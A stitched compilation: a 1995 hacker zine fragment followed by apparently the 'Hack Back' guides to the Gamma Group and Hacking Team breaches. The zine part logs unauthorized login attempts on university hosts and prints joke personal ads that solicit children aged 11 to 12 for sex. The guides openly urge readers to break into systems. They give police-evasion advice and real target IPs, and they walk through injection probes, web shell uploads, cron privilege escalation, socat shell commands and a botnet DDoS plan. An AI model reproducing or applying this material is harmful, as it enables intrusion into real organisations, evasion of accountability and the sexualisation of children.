**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl)
**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl)
**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet)
This system is restricted to authorized Temple University users and is
subject to audit. The unauthorized access, use, or modification of any
network component is a criminal violation of federal and state laws. (4)
TempleNet>telnet ibm
Trying IBM (155.247.14.2)... Open
.
.exit
HCPCFC015E Command not valid before LOGON: EXIT

Enter one of the following commands:

 LOGON userid (Example: LOGON VMUSER1)
 LOGOFF
.logon vmuser1
HCPLGA053E VMUSER1 not in CP directory

Enter one of the following commands:

 LOGON userid (Example: LOGON VMUSER1)
 LOGOFF
.logoff
LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95

[Connection to IBM closed by foreign host]
TempleNet>
TempleNet>?
connect <host> Connect to host - same as typing just a host name
disconnect <cn> Break the connection specified by name or number
exit, quit, logout Exit from the EXEC
lat <service> Connect to service using DEC LAT protocol
lock Lock the terminal
name-connection Give a connection a logical name
resume Make the named connection be current
rlogin <host> Connect to host using rlogin protocol
show <cmd> Information commands, type "show ?" for list
slip <addr> Enter SLIP mode
systat Show terminal lines and users
telnet <host> Connect to host using telnet protocol
tn3270 <host> Connect to host using telnet protocol (3270)
terminal Change terminal's parameters, type "terminal ?"
where Show open connections
xremote Enter XRemote mode
<cr> To resume connection
TempleNet>
TempleNet>telnet astro
Trying ASTRO (155.247.165.100)... Open
EP/IX (astro)
login: user1
Password:
UX:login: ERROR: Login incorrect
NO CARRIER
Now remember ... :-)
This system is restricted to authorized Temple University users and is
subject to audit. The unauthorized access, use, or modification of any
network component is a criminal violation of federal and state laws. (4)
Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe)
-Sarlo 10/13/95 [L0CK]
------------------------------------------------------------------------------
LETTERS TO [L0CK]
Dear [L0CK],
I have been dating my boyfreind for almost 2 years and i thought i really
loved him. But a few months ago i met another guy who is absolutely
adoreable and lots of fun to be with. I feel guilty and miserable when
I'm with this other man. What sould I do, [L0CK]?
- Torn Between Two Lovers
Dear Torn,
Ah the classic love triangle. The situation is really not fair to anyone,
but the longer you stay in it the stickier it will get.[teehee] Get your
long-term relationship out in the open. Whatever you decide to do, do it
fast and gently!
- blewt [L0CK]
******************************************************************************
ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS
IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR
PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE
LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN
AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND
MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q
*****************************************************************************
|
COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS
|
Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life
for boys who like red bottoms and | and Homosexuality. Call and be
propper punishment. | involved. 703-360-8427
|
--------------------------------------+---------------------------------------
|
ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE
|
Confused About Relationships and | Seeking Discreet Dominant Male
tired of being hassled by nosey | for sensual stimulation and some
Investigators from the Child Welfare | Phantastic times. You Know what
Agencey? We Can Help. Discreet. | You want! Come and Get it!
|
--------------------------------------+---------------------------------------
|
YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD
|
Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@!
their Equipment. I'll Show You an |
Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO:
Change Your Lifestyle! | MAX-Q@2600.COM
|
--------------------------------------+---------------------------------------
|
ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3)
|
Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY
video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3
Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL.
Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd
|
--------------------------------------+---------------------------------------
|
LET'S BE FREE | MUCH OLDER GENTLEMAN
|
Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18
for men, 12 - 32 clean, fit, and | who is petite. Someone to go
hairy. Discreet Encounters. | out with. Very Discreet.
Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041
|
--------------------------------------+---------------------------------------
"The Warrior's Prayer," by blewt [L0CK]
To my ancestors, whom I shall leave anonymous, and my man, max-q:
I leave this day for battle.
I know not whom I fight.
The victory is not certain.
For our enemies are strong.
I carry myself with courage.
Though I quake with fear.
I fight them all with honor.
For I have my brothers near.
Oh ye I pray to thee,
Those who came before,
For the strength of heart I need...
Just to lift this keyboard.
I know I seem the coward,
Standing on the snow.
I no longer wear my armor.
I have lost my will to love.
What can I do with this life,
O ye in the beyond?
How can I look the others in the face,
Now that my will to love is gone?
So to thee I say my final goodbye,
And a hardy forget-me-not.
For I'll always have my brothers,
And together we are [L0CK].
- blewt - 1995

407
PhineasFisher/1.txt Executable file
View file

@ -0,0 +1,407 @@
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide for those without the patience to wait for whistleblowers
--[ 1 ]-- Introduction
I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you've learned the basics you'll realize this
really is easier than filing a FOIA request.
--[ 2 ]-- Staying Safe
This is illegal, so you'll need to take same basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it's better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.
[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix
As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you'll want a public IP address to
receive connect back shells. I recommend using servers you've hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you're running will
have a nice fast connection to your target.
--[ 3 ]-- Mapping out the target
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.
[0] http://ha.ckers.org/fierce/
For an example let's take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 - 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
Doing a whois lookup on academi.com reveals it's also registered to the same
address, so we'll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you've found everything.
Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
If you repeat the whois lookups and such you'll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
"FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com
...so now you've got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.
--[ 4 ]-- Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn't? Sometimes companies will have services
running that require no authentication and just assume it's safe because the url
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
default password.
3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren't intended
for public viewing like test.company.com or dev.company.com you'll often find
interesting stuff just by looking at them.
2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.
3) Identify what software is being used on the website. WhatWeb is useful [1]
4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].
First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it's time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.
6) For the non-custom software they're running, get a copy to look at. If it's
free software you can just download it. If it's proprietary you can usually
pirate it. If it's proprietary and obscure enough that you can't pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that's easier to hack, and get a copy from them.
[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/
For finsupport.finfisher.com the process was:
* Start nikto running in the background.
* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn't recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.
* I view the page source to find a URL I can search on (index.php isn't
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:"Scripts/scripts.js.php"
* I find there's a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum
up views: "In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group..."
But it's really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:
* google allinurl:"Scripts/scripts.js.php" and find the other sites
* Notice they're all sql injectable in the first url parameter I try.
* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
the option --tamper='tamper/modsecurityversioned.py'
* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website's source code.
[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/
Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
javascript, and if you're unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.
[0] http://www.dvwa.co.uk/
Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
sqli (it's nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.
Looking through the source, I see customers can attach a file to their support
tickets, and there's no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I'm in!
--[ 5 ]-- (fail at) Escalating
___________
< got r00t? >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
^^^^^^^^^^^^^^^^
Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].
[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/
finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
wait an hour, and ....nothing. Turns out that while the cron process is running
it doesn't seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn't update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that's probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn't get much of anything new, so I move
on to the rest of the network.
--[ 6 ]-- Pivoting
The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport's local network was another
webserver serving up a folder called 'qateam' containing their mobile malware.
--[ 7 ]-- Have Fun
Once you're in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there's no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!
--[ 8 ]-- Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There's no one right way, and any method that works is as good as
any other. The other main ways that I'll state without going into detail are:
1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don't
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There's also
metasploit browser autopwn, but you'll probably have better luck with no
exploits and a fake flash updater prompt.
2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: "Social Engineering". This is probably the way to go if you don't know
too much about computers, and it really is all it takes to be a successful
hacker [0].
[0] https://www.youtube.com/watch?v=DB6ywr9fngU
--[ 9 ]-- Resources
Links:
* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It's also useful for setting up weird pivots and all kinds of other stuff.
Books:
* The Web Application Hacker's Handbook
* Hacking: The Art of Exploitation
* The Database Hacker's Handbook
* The Art of Software Security Assessment
* A Bug Hunter's Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.
--[ 10 ]-- Outro
You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It's not selling hacking tools that makes Gamma evil. It's who their
customers are targeting and with what purpose that makes them evil. That's not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it's cheaper to attack than to defend it's harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

925
PhineasFisher/2.txt Executable file
View file

@ -0,0 +1,925 @@
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
,-._,-._
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
#antisec
--[ 1 - Introduction ]----------------------------------------------------------
You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
--[ 3 - Stay safe out there ]---------------------------------------------------
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
----[ 3.1 - Infrastructure ]----------------------------------------------------
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
----[ 3.2 - Attribution ]-------------------------------------------------------
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
--[ 4 - Information Gathering ]-------------------------------------------------
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
----[ 4.1 - Technical Information ]---------------------------------------------
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/
----[ 4.2 - Social Information ]------------------------------------------------
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
4) Data.com
Previously known as jigsaw. They have contact information for many
employees.
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
--[ 5 - Entering the network ]--------------------------------------------------
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
----[ 5.1 - Social Engineering ]------------------------------------------------
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
----[ 5.2 - Buying Access ]-----------------------------------------------------
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.
----[ 5.3 - Technical Exploitation ]--------------------------------------------
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
